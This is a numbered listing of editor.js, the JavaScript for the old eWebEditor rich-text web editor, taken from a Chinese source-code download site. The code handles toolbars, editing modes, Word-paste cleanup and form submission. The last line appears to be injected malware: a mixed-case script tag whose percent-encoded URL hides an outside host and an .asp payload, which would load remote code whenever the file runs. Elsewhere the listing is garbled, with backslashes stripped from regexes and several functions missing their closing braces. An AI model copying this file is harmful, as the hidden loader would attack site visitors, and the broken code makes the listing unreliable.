editor.js
上传用户:sdtxjx
上传日期:2022-07-09
资源大小:2937k
文件大小:26k
源码类别:

Jsp/Servlet

开发平台:

Java

  1. // 当前模式
  2. var sCurrMode = null;
  3. var bEditMode = null;
  4. // 连接对象
  5. var oLinkField = null;
  6. var sBaseUrl = document.location.protocol + '//' + document.location.host ;
  7. // 浏览器版本检测
  8. var BrowserInfo = new Object() ;
  9. BrowserInfo.MajorVer = navigator.appVersion.match(/MSIE (.)/)[1] ;
  10. BrowserInfo.MinorVer = navigator.appVersion.match(/MSIE ..(.)/)[1] ;
  11. BrowserInfo.IsIE55OrMore = BrowserInfo.MajorVer >= 6 || ( BrowserInfo.MajorVer >= 5 && BrowserInfo.MinorVer >= 5 ) ;
  12. var yToolbars = new Array();  // 工具栏数组
  13. // 当文档完全调入时,进行初始化
  14. var bInitialized = false;
  15. function document.onreadystatechange(){
  16. if (document.readyState!="complete") return;
  17. if (bInitialized) return;
  18. bInitialized = true;
  19. var i, s, curr;
  20. // 初始每个工具栏
  21. for (i=0; i<document.body.all.length;i++){
  22. curr=document.body.all[i];
  23. if (curr.className == "yToolbar"){
  24. InitTB(curr);
  25. yToolbars[yToolbars.length] = curr;
  26. }
  27. }
  28. oLinkField = parent.document.getElementsByName(sLinkFieldName)[0];
  29. if (ContentFlag.value=="0") { 
  30. ContentEdit.value = oLinkField.value;
  31. ContentLoad.value = oLinkField.value;
  32. ContentFlag.value = "1";
  33. }
  34. setMode(config.InitMode);
  35. setLinkedField() ;
  36. eWebEditor.document.body.onpaste = onPaste ;
  37. eWebEditor.focus();
  38. }
  39. // 初始化一个工具栏上的按钮
  40. function InitBtn(btn) {
  41. btn.onmouseover = BtnMouseOver;
  42. btn.onmouseout = BtnMouseOut;
  43. btn.onmousedown = BtnMouseDown;
  44. btn.onmouseup = BtnMouseUp;
  45. btn.ondragstart = YCancelEvent;
  46. btn.onselectstart = YCancelEvent;
  47. btn.onselect = YCancelEvent;
  48. btn.YUSERONCLICK = btn.onclick;
  49. btn.onclick = YCancelEvent;
  50. btn.YINITIALIZED = true;
  51. return true;
  52. }
  53. //Initialize a toolbar. 
  54. function InitTB(y) {
  55. // Set initial size of toolbar to that of the handle
  56. y.TBWidth = 0;
  57. // Populate the toolbar with its contents
  58. if (! PopulateTB(y)) return false;
  59. // Set the toolbar width and put in the handle
  60. y.style.posWidth = y.TBWidth;
  61. return true;
  62. }
  63. // Hander that simply cancels an event
  64. function YCancelEvent() {
  65. event.returnValue=false;
  66. event.cancelBubble=true;
  67. return false;
  68. }
  69. // Toolbar button onmouseover handler
  70. function BtnMouseOver() {
  71. if (event.srcElement.tagName != "IMG") return false;
  72. var image = event.srcElement;
  73. var element = image.parentElement;
  74. // Change button look based on current state of image.
  75. if (image.className == "Ico") element.className = "BtnMouseOverUp";
  76. else if (image.className == "IcoDown") element.className = "BtnMouseOverDown";
  77. event.cancelBubble = true;
  78. }
  79. // Toolbar button onmouseout handler
  80. function BtnMouseOut() {
  81. if (event.srcElement.tagName != "IMG") {
  82. event.cancelBubble = true;
  83. return false;
  84. }
  85. var image = event.srcElement;
  86. var element = image.parentElement;
  87. yRaisedElement = null;
  88. element.className = "Btn";
  89. image.className = "Ico";
  90. event.cancelBubble = true;
  91. }
  92. // Toolbar button onmousedown handler
  93. function BtnMouseDown() {
  94. if (event.srcElement.tagName != "IMG") {
  95. event.cancelBubble = true;
  96. event.returnValue=false;
  97. return false;
  98. }
  99. var image = event.srcElement;
  100. var element = image.parentElement;
  101. element.className = "BtnMouseOverDown";
  102. image.className = "IcoDown";
  103. event.cancelBubble = true;
  104. event.returnValue=false;
  105. return false;
  106. }
  107. // Toolbar button onmouseup handler
  108. function BtnMouseUp() {
  109. if (event.srcElement.tagName != "IMG") {
  110. event.cancelBubble = true;
  111. return false;
  112. }
  113. var image = event.srcElement;
  114. var element = image.parentElement;
  115. if (element.YUSERONCLICK) eval(element.YUSERONCLICK + "anonymous()");
  116. element.className = "BtnMouseOverUp";
  117. image.className = "Ico";
  118. event.cancelBubble = true;
  119. return false;
  120. }
  121. // Populate a toolbar with the elements within it
  122. function PopulateTB(y) {
  123. var i, elements, element;
  124. // Iterate through all the top-level elements in the toolbar
  125. elements = y.children;
  126. for (i=0; i<elements.length; i++) {
  127. element = elements[i];
  128. if (element.tagName == "SCRIPT" || element.tagName == "!") continue;
  129. switch (element.className) {
  130. case "Btn":
  131. if (element.YINITIALIZED == null) {
  132. if (! InitBtn(element)) {
  133. alert("Problem initializing:" + element.id);
  134. return false;
  135. }
  136. }
  137. element.style.posLeft = y.TBWidth;
  138. y.TBWidth += element.offsetWidth + 1;
  139. break;
  140. case "TBGen":
  141. element.style.posLeft = y.TBWidth;
  142. y.TBWidth += element.offsetWidth + 1;
  143. break;
  144. case "TBSep":
  145. element.style.posLeft = y.TBWidth + 2;
  146. y.TBWidth += 5;
  147. break;
  148. case "TBHandle":
  149. element.style.posLeft = 2;
  150. y.TBWidth += element.offsetWidth + 7;
  151. break;
  152. default:
  153. alert("Invalid class: " + element.className + " on Element: " + element.id + " <" + element.tagName + ">");
  154. return false;
  155. }
  156. }
  157. y.TBWidth += 1;
  158. return true;
  159. }
  160. // 设置所属表单的提交或reset事件
  161. function setLinkedField() {
  162. if (! oLinkField) return ;
  163. var oForm = oLinkField.form ;
  164. if (!oForm) return ;
  165. // 附加submit事件
  166. oForm.attachEvent("onsubmit", AttachSubmit) ;
  167. if (! oForm.submitEditor) oForm.submitEditor = new Array() ;
  168. oForm.submitEditor[oForm.submitEditor.length] = AttachSubmit ;
  169. if (! oForm.originalSubmit) {
  170. oForm.originalSubmit = oForm.submit ;
  171. oForm.submit = function() {
  172. if (this.submitEditor) {
  173. for (var i = 0 ; i < this.submitEditor.length ; i++) {
  174. this.submitEditor[i]() ;
  175. }
  176. }
  177. this.originalSubmit() ;
  178. }
  179. }
  180. // 附加reset事件
  181. oForm.attachEvent("onreset", AttachReset) ;
  182. if (! oForm.resetEditor) oForm.resetEditor = new Array() ;
  183. oForm.resetEditor[oForm.resetEditor.length] = AttachReset ;
  184. if (! oForm.originalReset) {
  185. oForm.originalReset = oForm.reset ;
  186. oForm.reset = function() {
  187. if (this.resetEditor) {
  188. for (var i = 0 ; i < this.resetEditor.length ; i++) {
  189. this.resetEditor[i]() ;
  190. }
  191. }
  192. this.originalReset() ;
  193. }
  194. }
  195. }
  196. // 附加submit提交事件,大表单数据提交,远程文件获取,保存eWebEditor中的内容
  197. var bDoneAutoRemote = false;
  198. function AttachSubmit() { 
  199. var oForm = oLinkField.form ;
  200. if (!oForm) return;
  201. if ((config.AutoRemote=="1")&&(!bDoneAutoRemote)){
  202. parent.event.returnValue = false;
  203. bDoneAutoRemote = true;
  204. remoteUpload();
  205. } else {
  206. var html = getHTML();
  207. ContentEdit.value = html;
  208. if (sCurrMode=="TEXT"){
  209. html = HTMLEncode(html);
  210. }
  211. splitTextField(oLinkField, html);
  212. }
  213. // 提交表单
  214. function doSubmit(){
  215. var oForm = oLinkField.form ;
  216. if (!oForm) return ;
  217. oForm.submit();
  218. }
  219. // 附加Reset事件
  220. function AttachReset() {
  221. if (!bEditMode) setMode('EDIT');
  222. if(bEditMode){
  223. eWebEditor.document.body.innerHTML = ContentLoad.value;
  224. }else{
  225. eWebEditor.document.body.innerText = ContentLoad.value;
  226. }
  227. }
  228. // 粘贴时自动检测是否来源于Word格式
  229. function onPaste() {
  230. if (config.AutoDetectPasteFromWord && BrowserInfo.IsIE55OrMore) {
  231. var sHTML = GetClipboardHTML() ;
  232. var re = /<w[^>]* class="?MsoNormal"?/gi ;
  233. if ( re.test( sHTML ) )
  234. {
  235. if ( confirm( "你要粘贴的内容好象是从Word中拷出来的,是否要先清除Word格式再粘贴?" ) )
  236. {
  237. cleanAndPaste( sHTML ) ;
  238. return false ;
  239. }
  240. }
  241. }
  242. else
  243. return true ;
  244. }
  245. function GetClipboardHTML() {
  246. var oDiv = document.getElementById("eWebEditor_Temp_HTML")
  247. oDiv.innerHTML = "" ;
  248. var oTextRange = document.body.createTextRange() ;
  249. oTextRange.moveToElementText(oDiv) ;
  250. oTextRange.execCommand("Paste") ;
  251. var sData = oDiv.innerHTML ;
  252. oDiv.innerHTML = "" ;
  253. return sData ;
  254. }
  255. function cleanAndPaste( html ) {
  256. // Remove all SPAN tags
  257. html = html.replace(/</?SPAN[^>]*>/gi, "" );
  258. // Remove Class attributes
  259. html = html.replace(/<(w[^>]*) class=([^ |>]*)([^>]*)/gi, "<$1$3") ;
  260. // Remove Style attributes
  261. html = html.replace(/<(w[^>]*) style="([^"]*)"([^>]*)/gi, "<$1$3") ;
  262. // Remove Lang attributes
  263. html = html.replace(/<(w[^>]*) lang=([^ |>]*)([^>]*)/gi, "<$1$3") ;
  264. // Remove XML elements and declarations
  265. html = html.replace(/<\??xml[^>]*>/gi, "") ;
  266. // Remove Tags with XML namespace declarations: <o:p></o:p>
  267. html = html.replace(/</?w+:[^>]*>/gi, "") ;
  268. // Replace the &nbsp;
  269. html = html.replace(/&nbsp;/, " " );
  270. // Transform <P> to <DIV>
  271. var re = new RegExp("(<P)([^>]*>.*?)(</P>)","gi") ; // Different because of a IE 5.0 error
  272. html = html.replace( re, "<div$2</div>" ) ;
  273. insertHTML( html ) ;
  274. }
  275. // 在当前文档位置插入.
  276. function insertHTML(html) {
  277. if (!validateMode()) return;
  278. if (eWebEditor.document.selection.type.toLowerCase() != "none")
  279. eWebEditor.document.selection.clear() ;
  280. eWebEditor.document.selection.createRange().pasteHTML(html) ; 
  281. }
  282. // 设置编辑器的内容
  283. /*function setHTML(html) {
  284. ContentEdit.value = html;
  285. switch (sCurrMode){
  286. case "CODE":
  287. eWebEditor.document.designMode="On";
  288. eWebEditor.document.open();
  289. eWebEditor.document.write(config.StyleEditorHeader);
  290. eWebEditor.document.body.innerText=html;
  291. eWebEditor.document.body.contentEditable="true";
  292. eWebEditor.document.close();
  293. bEditMode=false;
  294. break;
  295. case "EDIT":
  296. eWebEditor.document.designMode="On";
  297. eWebEditor.document.open();
  298. eWebEditor.document.write(config.StyleEditorHeader+html);
  299. eWebEditor.document.body.contentEditable="true";
  300. eWebEditor.document.execCommand("2D-Position",true,true);
  301. eWebEditor.document.execCommand("MultipleSelection", true, true);
  302. eWebEditor.document.execCommand("LiveResize", true, true);
  303. eWebEditor.document.close();
  304. doZoom(nCurrZoomSize);
  305. bEditMode=true;
  306. eWebEditor.document.onselectionchange = function () { doToolbar();}
  307. break;
  308. case "TEXT":
  309. eWebEditor.document.designMode="On";
  310. eWebEditor.document.open();
  311. eWebEditor.document.write(config.StyleEditorHeader);
  312. eWebEditor.document.body.innerText=html;
  313. eWebEditor.document.body.contentEditable="true";
  314. eWebEditor.document.close();
  315. bEditMode=false;
  316. break;
  317. case "VIEW":
  318. eWebEditor.document.designMode="off";
  319. eWebEditor.document.open();
  320. eWebEditor.document.write(config.StyleEditorHeader+html);
  321. eWebEditor.document.body.contentEditable="false";
  322. eWebEditor.document.close();
  323. bEditMode=false;
  324. break;
  325. }
  326. eWebEditor.document.body.onpaste = onPaste ;
  327. eWebEditor.document.body.onhelp = onHelp ;
  328. eWebEditor.document.onkeydown = new Function("return onKeyDown(eWebEditor.event);");
  329. eWebEditor.document.oncontextmenu=new Function("return showContextMenu(eWebEditor.event);");
  330. if ((borderShown != "0")&&bEditMode) {
  331. borderShown = "0";
  332. showBorders();
  333. }
  334. initHistory();
  335. }*/
  336. // 设置编辑器的内容
  337. function setHTML(html) {
  338. if (!validateMode()) return;
  339. ContentEdit.value = html;
  340. if(bEditMode){
  341. eWebEditor.document.body.innerHTML = html;
  342. }else{
  343. eWebEditor.document.body.innerText = html;
  344. }
  345. }
  346. // 取编辑器的内容
  347. function getHTML() {
  348. var html;
  349. if(bEditMode){
  350. html = eWebEditor.document.body.innerHTML;
  351. }else{
  352. html = eWebEditor.document.body.innerText;
  353. }
  354. var re = new RegExp(sBaseUrl.replace(///,"/"),"gi");
  355. html = html.replace(re, "");
  356. if ((html.toLowerCase()=="<p>&nbsp;</p>")||(html.toLowerCase()=="<p></p>")){
  357. html = "";
  358. }
  359. return html;
  360. }
  361. // 在尾部追加内容
  362. function appendHTML(html) {
  363. if (!validateMode()) return;
  364. if(bEditMode){
  365. eWebEditor.document.body.innerHTML += html;
  366. }else{
  367. eWebEditor.document.body.innerText += html;
  368. }
  369. }
  370. // 从Word中粘贴,去除格式
  371. function PasteWord(){
  372. if (!validateMode()) return;
  373. eWebEditor.focus();
  374. if (BrowserInfo.IsIE55OrMore)
  375. cleanAndPaste( GetClipboardHTML() ) ;
  376. else if ( confirm( "此功能要求IE5.5版本以上,你当前的浏览器不支持,是否按常规粘贴进行?" ) )
  377. format("paste") ;
  378. eWebEditor.focus();
  379. }
  380. // 粘贴纯文本
  381. function PasteText(){
  382. if (!validateMode()) return;
  383. eWebEditor.focus();
  384. var sText = HTMLEncode( clipboardData.getData("Text") ) ;
  385. insertHTML(sText);
  386. eWebEditor.focus();
  387. }
  388. // 检测当前是否允许编辑
  389. function validateMode() {
  390. if (bEditMode) return true;
  391. alert("需转换为编辑状态后才能使用编辑功能!");
  392. eWebEditor.focus();
  393. return false;
  394. }
  395. // 格式化编辑器中的内容
  396. function format(what,opt) {
  397. if (!validateMode()) return;
  398. eWebEditor.focus();
  399. if (opt=="RemoveFormat") {
  400. what=opt;
  401. opt=null;
  402. }
  403. if (opt==null) eWebEditor.document.execCommand(what);
  404. else eWebEditor.document.execCommand(what,"",opt);
  405. eWebEditor.focus();
  406. }
  407. // 确保焦点在 eWebEditor 内
  408. function VerifyFocus() {
  409. if ( eWebEditor )
  410. eWebEditor.focus();
  411. }
  412. // 改变模式:代码、编辑、预览
  413. function setMode(NewMode){
  414. if (NewMode!=sCurrMode){
  415. var sBody = "";
  416. switch(sCurrMode){
  417. case "CODE":
  418. sBody = eWebEditor.document.body.innerText;
  419. break;
  420. case "EDIT":
  421. case "VIEW":
  422. sBody = eWebEditor.document.body.innerHTML;
  423. break;
  424. default:
  425. sBody = ContentEdit.value;
  426. break;
  427. }
  428. // 换图片
  429. try{
  430. document.all["eWebEditor_CODE"].className = "StatusBarBtnOff";
  431. document.all["eWebEditor_EDIT"].className = "StatusBarBtnOff";
  432. document.all["eWebEditor_VIEW"].className = "StatusBarBtnOff";
  433. document.all["eWebEditor_"+NewMode].className = "StatusBarBtnOn";
  434. }
  435. catch(e){
  436. }
  437. // 换内容
  438. switch (NewMode){
  439. case "CODE":
  440. eWebEditor.document.designMode="On";
  441. eWebEditor.document.open();
  442. eWebEditor.document.write(config.StyleEditorHeader);
  443. eWebEditor.document.body.innerText=sBody;
  444. eWebEditor.document.body.contentEditable="true";
  445. eWebEditor.document.oncontextmenu=new Function("return showContextMenu(eWebEditor.event);");
  446. eWebEditor.document.close();
  447. bEditMode=false;
  448. break;
  449. case "EDIT":
  450. eWebEditor.document.designMode="On";
  451. eWebEditor.document.open();
  452. eWebEditor.document.write(config.StyleEditorHeader);
  453. eWebEditor.document.body.innerHTML=sBody;
  454. eWebEditor.document.body.contentEditable="true";
  455. eWebEditor.document.oncontextmenu=new Function("return showContextMenu(eWebEditor.event);");
  456. eWebEditor.document.execCommand("2D-Position",true,true);
  457. eWebEditor.document.execCommand("MultipleSelection", true, true);
  458. eWebEditor.document.execCommand("LiveResize", true, true);
  459. eWebEditor.document.close();
  460. doZoom(nCurrZoomSize);
  461. bEditMode=true;
  462. break;
  463. case "VIEW":
  464. eWebEditor.document.designMode="off";
  465. eWebEditor.document.open();
  466. eWebEditor.document.write(config.StyleEditorHeader+sBody);
  467. eWebEditor.document.body.contentEditable="false";
  468. eWebEditor.document.close();
  469. bEditMode=false;
  470. break;
  471. }
  472. sCurrMode=NewMode;
  473. disableChildren(eWebEditor_Toolbar);
  474. if ((borderShown != "no")&&bEditMode) {
  475. borderShown = "no";
  476. showBorders()
  477. }
  478. }
  479. eWebEditor.focus();
  480. }
  481. // 使工具栏无效
  482. function disableChildren(obj){
  483. if (obj){
  484. obj.disabled=(!bEditMode);
  485. for (var i=0; i<obj.children.length; i++){
  486. disableChildren(obj.children[i]);
  487. }
  488. }
  489. }
  490. // 显示无模式对话框
  491. function ShowDialog(url, width, height, optValidate) {
  492. if (optValidate) {
  493. if (!validateMode()) return;
  494. }
  495. eWebEditor.focus();
  496. var arr = showModalDialog(url, window, "dialogWidth:" + width + "px;dialogHeight:" + height + "px;help:no;scroll:no;status:no");
  497. eWebEditor.focus();
  498. }
  499. // 全屏编辑
  500. function Maximize() {
  501. if (!validateMode()) return;
  502. window.open("dialog/fullscreen.htm?style="+config.StyleName, 'FullScreen'+sLinkFieldName, 'toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,fullscreen=yes');
  503. }
  504. // 替换特殊字符
  505. function HTMLEncode(text){
  506. text = text.replace(/&/g, "&amp;") ;
  507. text = text.replace(/"/g, "&quot;") ;
  508. text = text.replace(/</g, "&lt;") ;
  509. text = text.replace(/>/g, "&gt;") ;
  510. text = text.replace(/'/g, "&#146;") ;
  511. text = text.replace(/ /g,"&nbsp;");
  512. text = text.replace(/n/g,"<br>");
  513. text = text.replace(/t/g,"&nbsp;&nbsp;&nbsp;&nbsp;");
  514. return text;
  515. }
  516. // 插入特殊对象
  517. function insert(what) {
  518. if (!validateMode()) return;
  519. eWebEditor.focus();
  520. var sel = eWebEditor.document.selection.createRange();
  521. switch(what){
  522. case "excel": // 插入EXCEL表格
  523. insertHTML("<object classid='clsid:0002E510-0000-0000-C000-000000000046' id='Spreadsheet1' codebase='file:\Bobsoftwareoffice2000msowc.cab' width='100%' height='250'><param name='HTMLURL' value><param name='HTMLData' value='&lt;html xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;xmlns=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&lt;head&gt;&lt;style type=&quot;text/css&quot;&gt;&lt;!--tr{mso-height-source:auto;}td{black-space:nowrap;}.wc4590F88{black-space:nowrap;font-family:宋体;mso-number-format:General;font-size:auto;font-weight:auto;font-style:auto;text-decoration:auto;mso-background-source:auto;mso-pattern:auto;mso-color-source:auto;text-align:general;vertical-align:bottom;border-top:none;border-left:none;border-right:none;border-bottom:none;mso-protection:locked;}--&gt;&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;&lt;x:ExcelWorkbook&gt;&lt;x:ExcelWorksheets&gt;&lt;x:ExcelWorksheet&gt;&lt;x:OWCVersion&gt;9.0.0.2710&lt;/x:OWCVersion&gt;&lt;x:Label Style='border-top:solid .5pt silver;border-left:solid .5pt silver;border-right:solid .5pt silver;border-bottom:solid .5pt silver'&gt;&lt;x:Caption&gt;Microsoft Office Spreadsheet&lt;/x:Caption&gt; &lt;/x:Label&gt;&lt;x:Name&gt;Sheet1&lt;/x:Name&gt;&lt;x:WorksheetOptions&gt;&lt;x:Selected/&gt;&lt;x:Height&gt;7620&lt;/x:Height&gt;&lt;x:Width&gt;15240&lt;/x:Width&gt;&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt; &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt; &lt;x:DefaultRowHeight&gt;210&lt;/x:DefaultRowHeight&gt; &lt;x:StandardWidth&gt;2389&lt;/x:StandardWidth&gt; &lt;/x:WorksheetOptions&gt; &lt;/x:ExcelWorksheet&gt;&lt;/x:ExcelWorksheets&gt; &lt;x:MaxHeight&gt;80%&lt;/x:MaxHeight&gt;&lt;x:MaxWidth&gt;80%&lt;/x:MaxWidth&gt;&lt;/x:ExcelWorkbook&gt;&lt;/xml&gt;&lt;![endif]--&gt;&lt;table class=wc4590F88 x:str&gt;&lt;col width=&quot;56&quot;&gt;&lt;tr height=&quot;14&quot;&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;'> <param name='DataType' value='HTMLDATA'> <param name='AutoFit' value='0'><param name='DisplayColHeaders' value='-1'><param name='DisplayGridlines' value='-1'><param name='DisplayHorizontalScrollBar' value='-1'><param name='DisplayRowHeaders' value='-1'><param name='DisplayTitleBar' value='-1'><param name='DisplayToolbar' value='-1'><param name='DisplayVerticalScrollBar' value='-1'> <param name='EnableAutoCalculate' value='-1'> <param name='EnableEvents' value='-1'><param name='MoveAfterReturn' value='-1'><param name='MoveAfterReturnDirection' value='0'><param name='RightToLeft' value='0'><param name='ViewableRange' value='1:65536'></object>");
  524. break;
  525. case "nowdate": // 插入当前系统日期
  526. var d = new Date();
  527. insertHTML(d.toLocaleDateString());
  528. break;
  529. case "nowtime": // 插入当前系统时间
  530. var d = new Date();
  531. insertHTML(d.toLocaleTimeString());
  532. break;
  533. case "br": // 插入换行符
  534. insertHTML("<br>")
  535. break;
  536. case "code": // 代码片段样式
  537. insertHTML('<table width=95% border="0" align="Center" cellpadding="6" cellspacing="0" style="border: 1px Dotted #CCCCCC; TABLE-LAYOUT: fixed"><tr><td bgcolor=#FDFDDF style="WORD-WRAP: break-word"><font style="color: #990000;font-weight:bold">以下是代码片段:</font><br>'+HTMLEncode(sel.text)+'</td></tr></table>');
  538. break;
  539. case "quote": // 引用片段样式
  540. insertHTML('<table width=95% border="0" align="Center" cellpadding="6" cellspacing="0" style="border: 1px Dotted #CCCCCC; TABLE-LAYOUT: fixed"><tr><td bgcolor=#F3F3F3 style="WORD-WRAP: break-word"><font style="color: #990000;font-weight:bold">以下是引用片段:</font><br>'+HTMLEncode(sel.text)+'</td></tr></table>');
  541. break;
  542. case "big": // 字体变大
  543. insertHTML("<big>" + sel.text + "</big>");
  544. break;
  545. case "small": // 字体变小
  546. insertHTML("<small>" + sel.text + "</small>");
  547. break;
  548. default:
  549. alert("错误参数调用!");
  550. break;
  551. }
  552. sel=null;
  553. }
  554. // 显示或隐藏指导方针
  555. var borderShown = "no";
  556. function showBorders() {
  557. if (!validateMode()) return;
  558. var allForms = eWebEditor.document.body.getElementsByTagName("FORM");
  559. var allInputs = eWebEditor.document.body.getElementsByTagName("INPUT");
  560. var allTables = eWebEditor.document.body.getElementsByTagName("TABLE");
  561. var allLinks = eWebEditor.document.body.getElementsByTagName("A");
  562. // 表单
  563. for (a=0; a < allForms.length; a++) {
  564. if (borderShown == "no") {
  565. allForms[a].runtimeStyle.border = "1px dotted #FF0000"
  566. } else {
  567. allForms[a].runtimeStyle.cssText = ""
  568. }
  569. }
  570. // Input Hidden类
  571. for (b=0; b < allInputs.length; b++) {
  572. if (borderShown == "no") {
  573. if (allInputs[b].type.toUpperCase() == "HIDDEN") {
  574. allInputs[b].runtimeStyle.border = "1px dashed #000000"
  575. allInputs[b].runtimeStyle.width = "15px"
  576. allInputs[b].runtimeStyle.height = "15px"
  577. allInputs[b].runtimeStyle.backgroundColor = "#FDADAD"
  578. allInputs[b].runtimeStyle.color = "#FDADAD"
  579. }
  580. } else {
  581. if (allInputs[b].type.toUpperCase() == "HIDDEN")
  582. allInputs[b].runtimeStyle.cssText = ""
  583. }
  584. }
  585. // 表格
  586. for (i=0; i < allTables.length; i++) {
  587. if (borderShown == "no") {
  588. allTables[i].runtimeStyle.border = "1px dotted #BFBFBF"
  589. } else {
  590. allTables[i].runtimeStyle.cssText = ""
  591. }
  592. allRows = allTables[i].rows
  593. for (y=0; y < allRows.length; y++) {
  594.   allCellsInRow = allRows[y].cells
  595. for (x=0; x < allCellsInRow.length; x++) {
  596. if (borderShown == "no") {
  597. allCellsInRow[x].runtimeStyle.border = "1px dotted #BFBFBF"
  598. } else {
  599. allCellsInRow[x].runtimeStyle.cssText = ""
  600. }
  601. }
  602. }
  603. }
  604. // 链接 A
  605. for (a=0; a < allLinks.length; a++) {
  606. if (borderShown == "no") {
  607. if (allLinks[a].href.toUpperCase() == "") {
  608. allLinks[a].runtimeStyle.border = "1px dashed #000000"
  609. allLinks[a].runtimeStyle.width = "20px"
  610. allLinks[a].runtimeStyle.height = "16px"
  611. allLinks[a].runtimeStyle.backgroundColor = "#FFFFCC"
  612. allLinks[a].runtimeStyle.color = "#FFFFCC"
  613. }
  614. } else {
  615. allLinks[a].runtimeStyle.cssText = ""
  616. }
  617. }
  618. if (borderShown == "no") {
  619. borderShown = "yes"
  620. } else {
  621. borderShown = "no"
  622. }
  623. scrollUp()
  624. }
  625. // 返回页面最上部
  626. function scrollUp() {
  627. eWebEditor.scrollBy(0,0);
  628. }
  629. // 缩放操作
  630. var nCurrZoomSize = 100;
  631. var aZoomSize = new Array(10, 25, 50, 75, 100, 150, 200, 500);
  632. function doZoom(size) {
  633. eWebEditor.document.body.runtimeStyle.zoom = size + "%";
  634. nCurrZoomSize = size;
  635. }
  636. // 拼写检查
  637. function spellCheck(){
  638. ShowDialog('dialog/spellcheck.htm', 300, 220, true)
  639. }
  640. // 查找替换
  641. function findReplace(){
  642. ShowDialog('dialog/findreplace.htm', 320, 165, true)
  643. }
  644. // 相对(absolute)或绝对位置(static)
  645. function absolutePosition(){
  646. var objReference = null;
  647. var RangeType = eWebEditor.document.selection.type;
  648. if (RangeType != "Control") return;
  649. var selectedRange = eWebEditor.document.selection.createRange();
  650. for (var i=0; i<selectedRange.length; i++){
  651. objReference = selectedRange.item(i);
  652. if (objReference.style.position != 'absolute') {
  653. objReference.style.position='absolute';
  654. }else{
  655. objReference.style.position='static';
  656. }
  657. }
  658. eWebEditor.content = false;
  659. eWebEditor.setActive();
  660. }
  661. // 上移(forward)或下移(backward)一层
  662. function zIndex(action){
  663. var objReference = null;
  664. var RangeType = eWebEditor.document.selection.type;
  665. if (RangeType != "Control") return;
  666. var selectedRange = eWebEditor.document.selection.createRange();
  667. for (var i=0; i<selectedRange.length; i++){
  668. objReference = selectedRange.item(i);
  669. if (action=='forward'){
  670. objReference.style.zIndex  +=1;
  671. }else{
  672. objReference.style.zIndex  -=1;
  673. }
  674. objReference.style.position='absolute';
  675. }
  676. eWebEditor.content = false;
  677. eWebEditor.setActive();
  678. }
  679. // 是否选中指定类型的控件
  680. function isControlSelected(tag){
  681. if (eWebEditor.document.selection.type == "Control") {
  682. var oControlRange = eWebEditor.document.selection.createRange();
  683. if (oControlRange(0).tagName.toUpperCase() == tag) {
  684. return true;
  685. }
  686. }
  687. return false;
  688. }
  689. // 改变编辑区高度
  690. function sizeChange(size){
  691. for (var i=0; i<parent.frames.length; i++){
  692. if (parent.frames[i].document==self.document){
  693. var obj=parent.frames[i].frameElement;
  694. var height = parseInt(obj.offsetHeight);
  695. if (height+size>=300){
  696. obj.height=height+size;
  697. }
  698. break;
  699. }
  700. }
  701. }
  702. // 大文件内容自动拆分
  703. function splitTextField(objField, html) { 
  704. var strFieldName = objField.name;
  705. var objForm = objField.form;
  706. var objDocument = objField.document;
  707. objField.value = html;
  708. //表单限制值设定,限制值是102399,考虑到中文设为一半
  709. var FormLimit = 50000 ;
  710. // 再次处理时,先赋空值
  711. for (var i=1;i<objDocument.getElementsByName(strFieldName).length;i++) {
  712. objDocument.getElementsByName(strFieldName)[i].value = "";
  713. }
  714. //如果表单值超过限制,拆成多个对象
  715. if (html.length > FormLimit) { 
  716. objField.value = html.substr(0, FormLimit) ;
  717. html = html.substr(FormLimit) ;
  718. while (html.length > 0) { 
  719. var objTEXTAREA = objDocument.createElement("TEXTAREA") ;
  720. objTEXTAREA.name = strFieldName ;
  721. objTEXTAREA.style.display = "none" ;
  722. objTEXTAREA.value = html.substr(0, FormLimit) ;
  723. objForm.appendChild(objTEXTAREA) ;
  724. html = html.substr(FormLimit) ;
  725. // 远程上传
  726. function remoteUpload() { 
  727. if (sCurrMode=="TEXT") return;
  728. var objField = document.getElementsByName("eWebEditor_UploadText")[0];
  729. splitTextField(objField, getHTML());
  730. divProcessing.style.top = (document.body.clientHeight-parseFloat(divProcessing.style.height))/2;
  731. divProcessing.style.left = (document.body.clientWidth-parseFloat(divProcessing.style.width))/2;
  732. divProcessing.style.display = "";
  733. eWebEditor_UploadForm.submit();
  734. // 远程上传完成
  735. function remoteUploadOK() {
  736. divProcessing.style.display = "none";
  737. if (bDoneAutoRemote){
  738. doSubmit();
  739. }
  740. }
  741. <ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>